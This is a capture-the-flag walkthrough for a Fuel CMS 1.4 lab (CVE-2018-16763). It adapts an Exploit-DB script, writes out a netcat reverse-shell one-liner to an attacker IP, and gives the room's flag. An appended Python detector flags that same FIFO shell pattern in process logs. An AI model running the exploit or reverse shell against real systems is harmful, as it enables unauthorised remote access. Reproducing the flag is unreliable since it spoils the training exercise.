
Vulnerability Capstone
This guide contains the answers, and the steps necessary to get to them, for the Vulnerability Capstone room.
Exploit the Machine (Flag Submission)
- What is the name of the application running on the vulnerable machine?
The easiest first step to take is to navigate to the application through our browser.
Here we get the name as well as the version of the application.

Answer: Fuel CMS
- What is the version number of this application?
We can find the answer in the previous image.
Answer: 1.4
- What is the number of the CVE that allows an attacker to remotely execute code on this application?
To find an exploit for this specific version of Fuel CMS, we can look it up on Exploit-DB. Here we see a CVE that we could use.

Answer: CVE-2018-16763
Use the resources & skills learnt throughout this module to find and use a relevant exploit to exploit this vulnerability.
Note: There are numerous exploits out there that can be used for this vulnerability (some more useful than others!)
- What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Since we are on Kali and have searchsploit installed, we can use the exploit file on our system located at `/usr/share/exploitdb/exploits/linux/webapps/47138.py`.
After some research, it seems we need to modify the script since we are using Python 3. Running it unchanged will give us an error.
Instead of using `urllib.quote`, we must use `urllib.parse.quote`. I also changed the URL to reflect my attack machine and removed the proxy entry.

Now we can use this script to get our initial access to the vulnerable machine.
```cmd
python3 47138.py
```
To stabilize our shell, we must first set up a Netcat listener with:
```cmd
nc -nlvp 1337
```
Then we execute the following command on our shell:
```cmd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.78.136 1337 >/tmp/f
```
Now on our other terminal tab we can navigate the system to our flag.

Answer: THM{ACKME_BLOG_HACKED}
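
For the defensive side of the named-pipe shell command used above, this added example (not part of the original walkthrough) flags process command lines in which one FIFO is both read and written around an interactive shell and an outbound netcat connection. The log format, the `user`/`parent` fields and the two benign lines are constructed for illustration.

```python
import re

# Constructed process-creation log lines (illustrative format, not from the page).
# Line 1 carries the command from the walkthrough; lines 2-3 are benign lookalikes.
SAMPLE_LOG = [
    'user=www-data parent=apache2 cmd="sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f'
    '|/bin/sh -i 2>&1|nc 10.18.78.136 1337 >/tmp/f"',
    'user=backup parent=cron cmd="sh -c mkfifo /tmp/logpipe; gzip -c < /tmp/logpipe > /var/backups/app.gz"',
    'user=admin parent=sshd cmd="nc -z 10.0.0.5 443"',
]

END = r'(?=[\s;|&]|$)'  # a path ends at whitespace, a shell separator or end of line
MKFIFO = re.compile(r'\b(?:mkfifo|mknod)\s+(?:-\S+\s+)*(/\S+?)' + END)
SHELL_I = re.compile(r'(?:^|[\s/|;])(?:sh|bash|dash|zsh)\s+-i\b')
NETCAT = re.compile(r'\b(?:nc|ncat|netcat)\b(?:\s+-\S+)*\s+'
                    r'(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b')
LINE = re.compile(r'user=(\S+) parent=(\S+) cmd="(.*)"$')


def detect_fifo_shell(cmdline):
    """Return a finding if one FIFO loops an interactive shell through netcat."""
    fifo, shell, net = (p.search(cmdline) for p in (MKFIFO, SHELL_I, NETCAT))
    if not (fifo and shell and net):
        return None
    path = re.escape(fifo.group(1))
    # The same FIFO must be both read (cat X or <X) and written (>X).
    reads = re.search(r'(?:\bcat\s+|<\s*)' + path + END, cmdline)
    writes = re.search(r'>\s*' + path + END, cmdline)
    if not (reads and writes):
        return None
    return {"fifo": fifo.group(1), "remote_ip": net.group(1),
            "remote_port": int(net.group(2))}


def scan(lines):
    """Parse each log line and collect findings with user and parent process."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = LINE.match(line)
        hit = detect_fifo_shell(m.group(3)) if m else None
        if hit:
            findings.append({"line": number, "user": m.group(1),
                             "parent": m.group(2), **hit})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A web server account (`www-data` under `apache2` here) spawning this pattern is the signal worth alerting on; the backup job's FIFO and the plain port check do not match.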